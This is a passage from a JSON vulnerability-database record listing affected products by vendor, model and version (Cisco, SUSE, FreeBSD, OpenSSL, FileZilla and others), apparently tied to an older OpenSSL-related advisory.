            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(1)"
          },
          {
            "_id": null,
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "_id": null,
            "model": "s8700 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "s8300 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "linux professional oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "8"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.9"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "_id": null,
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "suse linux retail solution",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "linux enterprise desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154548.0"
          },
          {
            "_id": null,
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "x8610.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "appliance server workgroup edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(2)"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.11"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.2"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "s8710 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "server c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "_id": null,
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.1"
          },
          {
            "_id": null,
            "model": "grid engine update5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux database server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "_id": null,
            "model": "suse linux standard server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(3)"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "grid engine update7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.1"
          },
          {
            "_id": null,
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.2.0"
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(0)"
          },
          {
            "_id": null,
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "server 0.9.1b",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "_id": null,
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.4.0"
          },
          {
            "_id": null,
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "call manager es32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "call manager 4.1 sr4",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.6"
          },
          {
            "_id": null,
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1-1"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.14"
          },
          {
            "_id": null,
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "open-enterprise-server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(1)"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.8"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.9"
          },
          {
            "_id": null,
            "model": "server a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6"
          },
          {
            "_id": null,
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "propack sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sgi",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "computing snapgear sg560",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "_id": null,
            "model": "suse linux school server for i386",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "grid engine sun linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "_id": null,
            "model": "stonebeat fullcluster for gauntlet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "current",
            "scope": null,
            "trust": 0.3,
            "vendor": "openpkg",
            "version": null
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1050"
          },
          {
            "_id": null,
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "networks meridian option 51c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7"
          },
          {
            "_id": null,
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "_id": null,
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3x86"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.3"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.6.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "server 0.8.6a",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "_id": null,
            "model": "-release-p3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.10"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "aironet acs350 c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3502.6"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "linux ppc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "firewalll",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(3)"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "_id": null,
            "model": "call manager sr2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.2.0.1"
          },
          {
            "_id": null,
            "model": "call manager sr2b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.0.201"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "call manager es07",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "95000"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.4"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6000"
          },
          {
            "_id": null,
            "model": "networks cs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(0)"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.8"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(0)"
          },
          {
            "_id": null,
            "model": "ons ios-based blades",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15454"
          },
          {
            "_id": null,
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.5"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.7"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76550"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "_id": null,
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.17"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.3"
          },
          {
            "_id": null,
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.5"
          },
          {
            "_id": null,
            "model": "financials server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "navision",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "fuji",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "0"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1.1"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.4"
          },
          {
            "_id": null,
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "_id": null,
            "model": "intuity lx",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "linux personal oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.4"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.x"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(1)"
          },
          {
            "_id": null,
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0(2)"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.1.3"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.1"
          },
          {
            "_id": null,
            "model": "access registrar",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "networks meridian option 81c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "linux openexchange server",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7.1"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.4"
          },
          {
            "_id": null,
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(3)"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "_id": null,
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "server 0.9.4d",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "_id": null,
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4"
          },
          {
            "_id": null,
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.42"
          },
          {
            "_id": null,
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "grid engine update7 1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "http server",
